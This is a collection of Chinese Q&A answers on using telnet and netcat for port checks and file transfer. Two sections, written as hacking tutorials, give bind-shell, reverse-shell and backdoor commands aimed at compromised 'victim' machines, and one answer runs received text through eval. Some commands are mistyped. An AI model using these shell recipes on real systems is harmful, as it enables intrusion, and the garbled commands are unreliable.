① 如何用telnet測試埠
1、安裝telnet。我的win7下就沒有telnet,在cmd下輸入telnet提示沒有該命令。於是我們進入控制面板---->程序---->打開或關閉windows功能。然後等一段時間,在出來的對話框把telnet客戶端和telnet伺服器勾選上,其他的不用管,然後點擊確定。這樣就安裝好了telnet組件了。
2、 下面開始測試某個埠是否開啟,比如我測的是192.168.3.42的2121這個埠。在cmd下輸入
start /min telnet 192.168.3.42 2121
之後會出現一個窗口,是最小化的,你等一會,如果窗口自動關閉了,說明埠是關閉的或主機ping不通,反之埠開放.
比如這個2121埠是開放的,就出現如圖所以的窗口,否則窗口關閉。
3、你可以用自己的機子做實驗.在CMD下輸入netstat -anp tcp可以查看當前主機tcp開放了哪些埠.
最後 ping命令是不能檢測埠,只能檢測你和相應IP是否能連通.
補充: linux下檢測本機的埠是否被佔用:
netstat –apn | grep 8080
又或者在,windows下
在cmd裡面使用netstat -an命令來查看 開放的TCP和UDP埠。
在cmd裡面使用start /min telnet 127.0.0.1 某埠,之後會出現一個窗口,是最小化的,你等一會,如果窗口自動關閉了,說明埠是關閉,反之埠開放。
Linux下
如windows下使用telnet的方法
使用nc命令
nc檢測埠的用法:
nc -z -w 10 %ip% %PORT%
-z表示檢測或者掃描埠
-w表示超時時間
-u表示使用UDP協議
例如:
# nc -z -w 10 -u 127.0.0.1 53
Connection to 127.0.0.1 53 port [udp/domain] succeeded!
# nc -z -w 10127.0.0.1 53
Connection to 127.0.0.1 53 port [tcp/domain] succeeded!
# echo $?
0
# nc -z -w 10 8.8.8.7 53
# echo $?
1
#
埠成功聯通返回值是0,提示succeeded;否則返回1,不提示任何數據。linux下未作測試,自行測試。
② Linux怎麼使用NC命令永久監聽本地埠
學生機:(IP 192.168.2.226 ) nc -lp 1984 >cmd eval `cat cmd` 教師機: echo 'echo todosomething' | nc -q 0 192.168.2.226 1984 nc工具短小精悍,不同Linux發行版本的功能選項略有差異,慢慢研究一下。
③ 為什麼用nc命令隨便檢查個ip地址埠號都成功
可以使用nc命令測試。
例如測試一下 某個個IP 的80 埠有沒有開啟可以使用命令:nc -z -w 1 「IP地址」 80
可以看到默認是使用TCP進行測試的,如果要測試UDP埠有沒有開放的可以添加-u 一起使用。例如我測試一下202.96.128.86 這個IP的UDP 53埠:nc -u -z -w 1 「ip地址」
上面可以看到成功的會顯示相關的信息,但是如果測試到埠是不開放的或者被防火牆攔截的就不會返回相關的信息。
④ Linux nc命令詳解 Linux nc命令怎麼用
Linux中nc命令是一個功能強大的網路工具,全稱是netcat。
語法:
nc [-hlnruz][-g<網關...>][-G<指向器數目>][-i<延遲秒數>][-o<輸出文件>][-p<通信埠>][-s<來源位址>][-v...][-w<超時秒數>][主機名稱][通信埠...]
參數說明:
-g<網關> 設置路由器躍程通信網關,最丟哦可設置8個。
-G<指向器數目> 設置來源路由指向器,其數值為4的倍數。
-h 在線幫助。
-i<延遲秒數> 設置時間間隔,以便傳送信息及掃描通信埠。
-l 使用監聽模式,管控傳入的資料。
-n 直接使用IP地址,而不通過域名伺服器。
-o<輸出文件> 指定文件名稱,把往來傳輸的數據以16進制字碼傾倒成該文件保存。
-p<通信埠> 設置本地主機使用的通信埠。
-r 亂數指定本地與遠端主機的通信埠。
-s<來源位址> 設置本地主機送出數據包的IP地址。
-u 使用UDP傳輸協議。
-v 顯示指令執行過程。
-w<超時秒數> 設置等待連線的時間。
-z 使用0輸入/輸出模式,只在掃描通信埠時使用。
實例:
1、TCP埠掃描
# nc -v -z -w2 127.0.0.1 1-100
Connection to 127.0.0.1 22 port [tcp/ssh] succeeded!
Connection to 127.0.0.1 53 port [tcp/domain] succeeded!
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
...
nc: connect to 127.0.0.1 port 100 (tcp) failed: Connection refused
2、從192.168.1.2拷貝文件到192.168.1.3
首先在接收端192.168.1.3上: nc -l 1234 > test.txt
然後在發送端192.168.1.2上: nc 192.168.1.3 < test.txt
注意:先運行接收端,指定一個埠為1234,文件為test.txt,再執行發送端,並且發送端必須存在同名的文件test.txt
3、傳輸目錄
從server1(192.168.16.233)拷貝nginx目錄內容到server2(192.168.48.47)上。需要先在server2上,用nc激活監聽,
server2上運行:# nc -l 1234 | tar xzv-
server1上運行:# tar czv- nginx | nc 192.168.48.47 1234
4、簡單聊天工具
在192.168.1.2上: nc -l 1234
在192.168.1.3上: nc 192.168.1.2 1234
這樣,雙方就可以相互交流了。使用ctrl+C(或D)退出
⑤ linux怎麼使用nc命令來發送一串使用udp協議的數據或者不是NC也可以的命令
echo -n 「foo" | nc -4u -w1 <host> <udp port>
或者
echo -n "hello" >/dev/udp/localhost/8000
⑥ Linux的nc命令不能用了。
你需要安裝nc
確定你的DNS可以解析公網地址(命令:vi /etc/resolv.conf,添加:nameserver 222.172.200.68)
使用命令:yum install nc
安裝完成再使用命令:nc -l 5001
⑦ NC怎麼用啊
NC使用教程
使用動畫可以提供給核心成員,菜鳥們也可向我索取
在黑客界混如果不知道什麼叫NC的話,那可真是白混了
今天教大家如何來使用NC
講四個命令
命令1:監聽命令
nc -l -p port
nc -l -p port > e:\log.dat
nc -l -v -p port
參數解釋:
-l:監聽埠,監聽入站信息
-p:後跟本地埠號
-v:顯示埠的信息,如果使用-vv的話,則會顯示埠更詳細的信息
提示:一般大家都愛用-vv
nc -l -p 80
這個很簡單,監聽80埠
如果機器上運行這個命令,埠80被認為是開放的,可以欺騙很多掃描器的哦!
nc -l -p 80 > e:\log.dat
呵呵,功能和上邊一樣,但是後邊加了個「> e:\log.dat」我想,學過ECHO
那個命令的人都會知道吧,是在E盤創建一個log.dat的日誌文件
nc -l -v -p 80
和上邊命令相似,不過這次不是記錄在文件里,而是會直接顯示在運行著NC
的屏幕上。
呵呵,講了這么多,來實踐下
nc -l -v -p 80
然後在瀏覽器中輸入本機IP:127.0.0.1
呵呵,看到什麼?
同樣,上邊兩個也是一樣,大家自己試驗一下吧
命令2:程序定向
nc -l -p port -t -e cmd.exe
本地機: nc -l -p port 或 nc -l -v -p port
目標機:nc -e cmd.exe ip port
參數解釋:
-l、-p兩個參數已經解釋過了
-e;作用就是程序定向
-t:以telnet的形式來應答
例子
nc -l -p 5277 -t -e cmd.exe
知道運行在哪裡嗎?千萬不要運行在自己的機器上,如果運行了,你機器
就會變成一台TELNET的伺服器了,呵呵,解釋一下:監聽本地埠5277的
入站信息,同時將CMD.exe這個程序,重定向到埠5277上,當有人連接的時候,就讓程序CMD.exe以TELNET的形式來響應連接要求。
說白了,其實就是讓他成為一台TELNET的肉雞,所以這個命令要運行在你的肉雞上。。(話外音:說這么多遍當我們白痴啊,快往下講!!!)
呵呵,咱們來找台肉雞試試,我TELNET IP 5277
HOHO~~如何?
local machine:nc -l -p port ( or nc -l -v -p port )
remote machine:nc -e cmd.exe ip port
大家知道灰鴿子和神偷吧,這兩款工具都是利用了反彈埠型的木馬,
什麼叫反彈埠?就是說,當對方中馬後,不用你主動和對方連接,也就是說
不用從你的client端向對方主機上運行的server端發送請求連接,而是對方主動來連接你
這樣就可以使很多防火牆失效,因為很多防火牆都不檢查出站請求的。
這里這兩個命令結合在一起後,於那兩款木馬可以說有異曲同工之效。為什麼?
咳!!聽我給你講啊!!(先交100000000RMB學費)哇,別殺我啊!!)
nc -l -p 5277 (堅聽本地5277埠)
同樣也可以用
nc -l -v -p 5277
運行在本地
然後在遠程機器上,想辦法運行
nc -e cmd.exe ip 5277
(你可別真的打「ip」在肉機上啊)要打,xxx.xxx.xxx.xxx這樣!!
呵呵,看看在本地機器上出現了什麼?
這樣就是反彈~~在本地機器上得到了一個SHELL
命令3:掃描埠
nc -v ip port
nc -v -z ip port-port
nc -v -z -u ip port-port
參數解釋:
-z:將輸入輸出關掉,在掃描時使用
nc -v ip port
這個命令是針對某一個埠進行掃描
例如:
nc -v ip 135
掃描遠程主機的135埠,這樣獲得了該埠的一些簡單信息,但是針對某些埠,我們還可以獲得更多的信息
例如:80埠
我們可以使用nc -v ip 80 然後使用get方法來獲得對方的WEB伺服器的信息
nc -v -z ip port-port
這個命令是用來掃描的一個命令,這個命令用於快速掃描TCP埠,而port-port則是指定了掃描的埠范圍
例如:
nc -v -z ip 1-200
可以看到我機器上的1-200的TCP埠的開放情況
nc -v -z -u ip port-port
這個命令比上個命令多了個-u,這個命令的作用仍然是掃描埠,只是多了一個-u的參數,是用來掃UDP埠的
例如:
nc -v -z -u ip 1-200
這個命令就會掃1-200的UDP埠
命令4:傳送文件(HOHO,I LIKE)
LOCAL MACHINE:nc -v -n ip port < x:\svr.exe
REMOTE MACHINE:nc -v -l -p port > y:\svr.exe
參數解釋:
-n:指定數字的IP地址
這兩個命令結合起來是用來傳送文件的
首先,在遠程機上運行命令:
nc -v -l -p 5277 > c:\pulist.exe
這個命令還記的嗎?呵呵,是不是和監聽命令有點類似,對,沒錯,這個是監聽5277埠
並把接受到的信息數據寫到c:\pulist.exe中
這時候在本地機上運行
nc -v -n ip 5277 < e:\hack\pulist.exe
這個命令的意思就是,從本地E盤跟目錄中讀取pulist.exe文件的內容,並把這些數據發送到ip的5277埠上
這樣遠程主機就會自動創建一個pulist.exe文件。。呵呵,你想到了嗎??
上邊是NC的比較常用的方法,希望通過這些,大家能發揮自己的想像力,創造出更多更精彩的命令來,
因為NC的用法不僅僅局限於這幾種而已哦!!對NC來說,只有想不到,沒有做不到的!!!
⑧ 電腦常識:DOS命令之NC的定義和用法是
NC(netcat)的使用方法!
連接到某處:nc [-options] hostname port[s] [ports].....
監聽某埠等待連接:nc -l -p port [options] [hostname] [port] -options
-d 後台運行
-e prog 程序重定向,一旦有連接,就執行綁定的程序。
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 幫助信息
-i 設定延時時間。
-l 監聽方式,等待連入。連接完成後,結束監聽。
-L 監聽方式,等待連入。連接完成後,繼續監聽。
-n 只能使用ip地址。
-o file 指定要傳送的16進制代碼。
-p port 指定本地的埠號。
-r 隨意指定本地或遠程埠號。
-s addr 本地的源地址。
-t 回顯telnet信息。
-u UDP方式。
-v 顯示詳細的信息,-vv 可獲取更詳細的信息。
-w 指定超時的時間。
-z 用於scan。
以上就是nc的一些參數和選項,注意,這是nt版本的nc。如果是*nix的需要自己編譯。也都差不多,只是netcat.c默認是沒有-t和-e這個兩個參數,要改。
看看它能幹些什麼,(偶就知道這些)
1.埠的刺探:
nc -vv ip port
2.掃描器
nc -v -w 5 ip port-port
nc -v -z ip port-port
3. 後門
victim machine:
nc -l -p port -e cmd.exe
nc -l -p port -e /bin/sh
attacker machine:
nc victim ip -p port
得到一個shell。
4.反向連接
attacker machine:
nc -vv -l -p port
victim machine:
nc -e cmd.exe attacker ip -p port
nc -e /bin/sh attacker ip -p port
或者:
attacker machine:
nc -vv -l -p port1 /*用於輸入*/
nc -vv -l -p prot2 /*用於顯示*/
victim machine:
nc attacker ip port1 | cmd.exe | nc attacker ip port2
nc attacker ip port1 | /bin/sh | nc attacker ip port2
5.傳送文件:
attacker machine <-- victim machine
nc -d -l -p port < path file /*attacker machine*/
nc -vv attacker ip -p port > path file /*victim machine*/
attacker machine --> victim machine
nc -vv -l -p > patm file/*victim machine*/
nc -d victim ip -p port < path file /*attacker machine*/
⑨ 什麼是Linux系統中nc命令
Linux中nc命令是一個功能強大的網路工具,全稱是netcat。
測試使用
在一個終端上 輸入 nc -lk 9999
輸入數據。。。
新開啟一個終端
輸入 nc ip:9999
就可以看到上一個終端輸入的數據
⑩ linux nc命令查看埠通不通
如果是tcp埠,可以使用telnet命令登錄到該埠來測試該埠是否打開:如果telnet能夠連上,說明該埠已經打開,否則是關閉的。 如果是udp埠,可以使用埠掃描工具,比如nmap。 當然,nmap也可以用來掃描tcp埠,只是telnet更方便 另外,...